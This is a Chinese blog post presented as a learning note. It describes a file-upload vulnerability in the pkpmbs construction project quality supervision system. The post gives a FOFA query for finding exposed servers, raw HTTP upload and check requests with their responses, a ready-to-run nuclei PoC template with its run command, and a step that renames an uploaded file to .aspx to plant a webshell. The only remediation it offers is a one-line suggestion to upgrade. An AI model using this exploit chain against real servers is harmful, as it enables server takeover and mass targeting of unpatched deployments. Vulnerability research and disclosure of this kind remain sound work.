pkpmbs建设工程质量监督系统FileUpload.ashx文件上传漏洞
免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与本平台和发布者无关!!!
漏洞名称
pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传漏洞
漏洞描述
pkpmbs 建设工程质量监督系统,是湖南建研信息技术股份有限公司下的一款工程管理软件,该系统FileUpload.ashx 处存在文件上传漏洞,攻击者可上传webshell控制服务器。
FOFA搜索语句
icon_hash="2001627082"
漏洞复现
向靶场发送如下数据包上传文件
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png
YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"
/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--
响应内容如下
HTTP/1.1 200 OK
Connection: close
Content-Length: 128
Access-Control-Allow-Headers: Accept, Origin, Content-type,CrossDomain
Access-Control-Allow-Methods: *
Access-Control-Allow-Origin: *
Cache-Control: private
Content-Type: application/json; charset=utf-8
Date: Thu, 30 Nov 2023 02:24:04 GMT
Server: Microsoft-IIS/8.5
Set-Cookie: ASP.NET_SessionId=kdldimtwukmwmn4k22duulxjk; path=/; HttpOnly
X-Aspnet-Version: 4.0.30319
X-Powered-By: ASP.NET
{"code":0,"msg":"上传成功","data":"http://x.x.x.x/Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt"}
查看回显文件
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept-Encoding: gzip
响应数据包如下
HTTP/1.1 200 OK
Connection: close
Content-Length: 27
Accept-Ranges: bytes
Access-Control-Allow-Headers: Accept, Origin, Content-type,CrossDomain
Access-Control-Allow-Methods: *
Access-Control-Allow-Origin: *
Content-Type: text/plain
Date: Thu, 30 Nov 2023 02:24:04 GMT
Etag: W/"4d4c2493423da1:0"
Last-Modified: Thu, 30 Nov 2023 02:24:04 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
YsOxWxSvj1KyZow1PTsh98fdu6l
证明存在漏洞
nuclei poc
poc文件内容如下
id: pkpmbs-FileUpload-fileupload
info:
name: pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传漏洞
author: fgz
severity: critical
description: 'pkpmbs 建设工程质量监督系统,是湖南建研信息技术股份有限公司下的一款工程管理软件,该系统FileUpload.ashx 处存在文件上传漏洞,攻击者可上传webshell控制服务器。'
tags: 2023, pkpmbs, fileupload
metadata:
max-request: 1
fofa-query: icon_hash="2001627082"
verified: true
http:
- raw:
- |
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----{{randstr}}
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
------{{randstr}}
Content-Disposition: form-data; name="file"; filename="{{randstr}}.txt"
Content-Type: image/png
{{randstr}}
------{{randstr}}
Content-Disposition: form-data; name="target"
/Applications/SkillDevelopAndEHS/
------{{randstr}}--
- |
GET /Applications/SkillDevelopAndEHS/{{randstr}}.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && status_code_2 == 200 && contains(body_2, '{{randstr}}')"
运行POC
nuclei.exe -t pkpmbs-FileUpload-fileupload.yaml -l 1.txt
漏洞利用
该漏洞无法直接上传aspx文件,但可以先上传txt再做个文件格式转换
GET /Applications/SkillDevelopAndEHS/fileMove.cshtml?filePath=上传的文件名&factFilePath=转换后文件名.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Accept-Encoding: gzip
修复建议
升级到最新版本。
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 程序员小航
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果